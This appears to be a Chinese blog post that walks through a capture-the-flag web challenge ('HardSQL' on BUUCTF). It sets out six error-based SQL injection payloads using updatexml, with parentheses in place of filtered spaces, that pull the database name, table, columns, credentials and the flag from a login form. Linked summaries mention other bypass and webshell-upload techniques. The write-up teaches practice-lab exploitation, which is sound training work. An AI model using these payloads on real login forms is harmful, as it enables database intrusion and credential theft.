WEB-HardSQL

原创于 2025-12-13 19:49:07 发布 · 69 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #笔记 #网络安全 #web安全

BUUCTF 专栏收录该内容

4 篇文章

订阅专栏

对登录框进行fuzz测试，发现大部分关键词都被过滤，包括空格也被过滤。

本题采用报错注入的方式进行注入，采用updatexml函数，同时使用()对空格过滤进行绕过。

1.判断当前用户名

1'or(updatexml(1,concat(0x7e,(select(user())),0x7e),1))#

请添加图片描述
2.判断当前数据库

1'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#

在这里插入图片描述
当前数据库为’geek’

3.获取当前表名

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

在这里插入图片描述
当前表名为H4rDsq1

4.获取当前字段名

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

在这里插入图片描述

5.获取字段值

1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'@',password))from(H4rDsq1)),0x7e),1))#

在这里插入图片描述
获取到一半的flag值flag{d0990b7e-457a-4d73-9d

6.使用right函数获取右侧的另一半flag

1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,20))))from(H4rDsq1)),0x7e),1))#

在这里插入图片描述
最终flag为flag{d0990b7e-457a-4d73-9dcb-e2697805283e}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sapphire0Star

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[NISACTF 2022]hardsql - quine注入

oZuoShen123的博客

10-05

841

题目描述：`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入，且用户名要是bilala 1、经测试，参数为：username=&passwd=&login=登录，username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章：https://blog.csdn.ne

[极客大挑战 2019] web题-HardSQL

BROTHERYY的博客

07-13

473

复现环境：buuoj.cn union被过滤了，会被他抓住，使用updatexml 得到表名得到字段查询username和password 查询密码发现不能显示完全使用left和right进行查询 left=flag{2b77bf01-867e-4b28-a801-0 right=4-be1d-4be4-bc1b-24069dfe9222} 拼凑得到flag flag{2b77bf01-867e-4b28-a801-04-be1d-4be4-bc1b-24069dfe9222} ...

参与评论您还未登录，请先登录后发表或查看评论

BUU-web HardSQL

qq_46635165的博客

10-18

380

知识点： sql显错注入显错注入：简单来说，就是通过某些函数回显的报错信息来获取我们想要的数据；例如： mysql的 updatexml() 函数：由于 select user() 查询出的数据不符合 XPATH 语法，从而报错，顺便将 select user() 这条语句执行，并将结果以报错的方式显示出来；解题：打开解题网址，账户密码登录框，尝试单引号报错，报错成功；单引号闭合，并 # 号注释：闭合成功；接下来尝试 order by 字段猜测，发现被过滤：并且过滤了 union ,a.

BUUCTF---web---[极客大挑战 2019]HardSQL

2201_75556700的博客

05-19

1096

7、太可恶了，只爆出了一半，问题不大，我们使用right()函数，爆出password的，一般flag的长度为32位，加上前面爆出了大概有二十来个，继续爆右边大概15个就可以凑完整，不放心的话，可以爆长点。2、使用万能密码发现不可以，这种题前面有很多，这道题用前面的绕过方法不行，得换一种前面没有用过的方法，最近刚学了报错注入，前面就没有用这个方法，这里试试。查阅资料后发现需要构造下面的方法 and用^替换，#用%23替换，空格用()替换。4、用类似的方法查表名：这里注意=用like替换。

BUUCTF WEB HardSql

qq_41696858的博客

10-13

340

这题考的是报错注入判断注入类型还是跟之前一样的，一个单引号’直接看出来是单引号闭合下面就是注入方式了，之前的双写，堆叠肯定就不用想了，试试报错，emmm 关于报错注入，可以看这一篇，感觉写的还挺详细的，https://developer.aliyun.com/article/692723 基础payload: 账号：a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了，所以需要空格来绕过知道注入方

BUUCTF Writeup-Web-[极客大挑战 2019]HardSQL 1

菜鸟之路

07-17

3928

BUUCTF WriteUp Web [极客大挑战 2019]HardSQL 1 打开后提示sql注入，查看页面源代码：发现是get两个参数username和password到check.php 因此可以直接用hackbar构造……/check.php?username=aaa&password=aaa，并执行就可以了。用burpsuite直接改数据也行。然后开始注入，尝试加’、" 发现单引号有报错，双引号没有，没提示有括号，所以应该是普通单引号闭合的字符型注入点出现这行字说明输入的被过

[极客大挑战 2019]HardSQL

o3Ev的博客

04-16

7380

[极客大挑战 2019]HardSQL （主要记录一下自己做题的思路）题目：打开环境，得到：废话不多说，都说了是hardsql了，直接fuzz测试一下可以看到有很多还是没被过滤的，现在就要自己再手动测试一下常见的一些方式了，我这里说下我做这题的思路：先试着输入了admin' #，返回了：说明空格确实被过滤，接着就要想办法绕过空格了，先试着用了下/**/来绕过空格，发现同样被过滤了现在只有用()括号来绕过空格了，这里简单讲下空格绕过的原理：括号是来包含子查询的，任何可以计算出结果的语

BUUCTF---web---[SUCTF 2019]CheckIn

2201_75556700的博客

06-11

1397

7、先上传.user.ini文件，再上传图片马test.jpg。上传.user.ini后出现下面回显。.user.ini文件内容为：（文件命名必须和上传的图片马文件名一样，我这里是test.jpg）2、上传正常的jpg文件，提示内容不能有<?4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传。5、必须要是图片类型，将一句话木马，添加图片头后再上传。6、上传成功了，但是需要让图片马当成php代码来执行。10、使用系统函数，查看文件根目录，发现flag文件。9、测试，发现文件上传成功。

CTF-Web-[极客大挑战 2019]HardSQL

归子莫的博客

05-03

3091

CTF-Web-[极客大挑战 2019]HardSQL 博客说明文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！ CTP平台网址 https://buuoj.cn/challenges 题目 Web类，[极客大挑战 2019]HardSQL 打开题目的实例思路 SQl的题目，首先试一试...

[极客大挑战 2019]HardSQL--详细解析

m0_56019217的博客

11-28

882

考察了对空格、等号和部分关键字的绕过；考察了对报错注入的使用。

CTF-Web-SQL注入

beihai2013

01-26

3583

题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注题目来源：强网杯2019 题目链接：https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察：堆叠注入，sql的show语句，sql的预编译，sql修改表参考：https:/

【web-ctf总结】ctf_BUUCTF_web_总结（待更新）

一个努力生活的人的博客

05-12

1058

ctf_web

buuctf-[极客大挑战 2019]HardSQL(小宇特详解)

小宇的web博客

01-26

3444

buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入，先尝试一下万能密码，虽然感觉%100不能用果不其然双写再试一下发现也不行这里使用extractvalue和updatexml进行报错注入，空格和=号没有，所以我们要使用（）来代替空格，使用like来代替=号使用extractvalue（） /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database

OpenHarmony Flutter 分布式安全与隐私保护：跨设备可信交互与数据防泄漏方案

2501_93721151的博客

12-11

680

在开源鸿蒙（OpenHarmony）全场景分布式生态中，跨设备安全与隐私保护是实现多设备协同的生命线。随着设备间数据流通与交互频率的提升，数据泄露、身份伪造、权限滥用等安全风险也随之加剧；传统单设备安全方案难以适配分布式场景下的可信交互需求。基于开源鸿蒙的分布式安全服务（DSS）与 Flutter 的跨端安全开发能力，能够构建一套 **“设备可信认证、数据加密传输、权限动态管控、隐私数据脱敏”** 的分布式安全与隐私保护解决方案，赋能金融支付、健康医疗、智能家居等高敏感场景的跨设备协同。本文聚焦。

安全审查--跨站请求伪造--双重提交Cookie模式

petunsecn的专栏

12-12

587

本文详细讲解了双重提交Cookie模式防御CSRF攻击的原理与实现。首先通过网上银行转账案例展示了CSRF攻击的危害性，解释了攻击者如何利用浏览器自动携带Cookie的特性发起恶意请求。随后深入剖析了双重提交Cookie的核心理念：利用同源策略，要求请求同时携带Cookie中的token和请求头/体中的token进行双重验证。文章从零开始演示了实现步骤：1)服务器设置可被JavaScript读取的CSRF Token Cookie；2)前端获取Cookie中的token并添加到请求头；3)服务器验证两个t

第十一篇：Day31-33 前端安全与性能监控——从“能用”到“安全可靠”（对标职场“系统稳定性”需求）

2402_87628679的博客

12-11

1169

对于小型项目或特定业务场景，可通过自定义埋点实现核心指标监控，无需接入复杂工具。// src/utils/monitor.js（自定义监控工具） import axios from 'axios';// 监控数据上报接口（后端提供） const MONITOR_UPLOAD_URL = '/api/monitor/upload';

App反诈骗：一场面向移动生态的深度安全战争（接上文短信反诈）